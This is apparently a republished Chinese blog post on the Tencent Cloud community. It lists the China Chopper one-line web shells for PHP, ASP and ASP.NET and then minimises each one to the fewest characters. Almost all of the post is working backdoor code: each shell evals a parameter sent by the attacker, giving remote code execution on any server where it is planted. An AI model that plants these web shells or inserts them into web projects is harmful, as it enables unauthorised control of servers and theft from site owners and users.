前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >最短的各类一句话木马

最短的各类一句话木马

作者头像
逸鹏
发布2018-04-09 15:02:57
2.5K0
发布2018-04-09 15:02:57
举报
文章被收录于专栏:逸鹏说道逸鹏说道

菜刀readme.txt中附带一3个一句话: PHP:

1

<!--?php @eval($_POST['chopper']);?-->

ASP:

1

&lt;%eval request("chopper")%&gt;

ASP.NET:

1

&lt;%@ Page Language="Jscript"%&gt;&lt;%eval(Request.Item["chopper"],"unsafe");%&gt;

抛弃密码的长度不算,其实这3个一句话均不是最短的。 如: PHP我们可以这样写:

1

<!--?php @eval($_POST['0']);?-->

原版

1

<!--?=eval($_POST[0]);? &gt;&lt;br ?-->

缩小版 ASP我们可以这样写:

1

&lt;%eval request("0")%&gt;

原版

1

&lt;%eval request(0)%&gt;

缩小版 ASP.NET可以这样写:

1

&lt;%@ Page Language="Jscript"%&gt;&lt;%eval(Request.Item["z"],"unsafe");%&gt;

原版

1

&lt;%@Page Language=JS%&gt;&lt;%eval(Request.Item(0),"unsafe");%&gt;

缩小版 当然你也可以把它写成这样(很显然体积上不占优势):

1

&lt;%@Page Language="JAVASCRIPT"%&gt;&lt;%eval(Request.Item(0),"unsafe");%&gt;

已经用了许久的东西,直接回复原贴感觉很多人看不到,还是单独发出来吧。 和原求助贴中的最长字符数对比:

1

&lt;%@ Page Language="Jscript"%&gt;&lt;%eval(Request.Item["1"],"unsafe

1

&lt;%@Page Language=JS%&gt;&lt;%eval(Request.Item(0),"unsafe");%&gt;

显然达到目的了。

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2015-11-01,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 我为Net狂 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档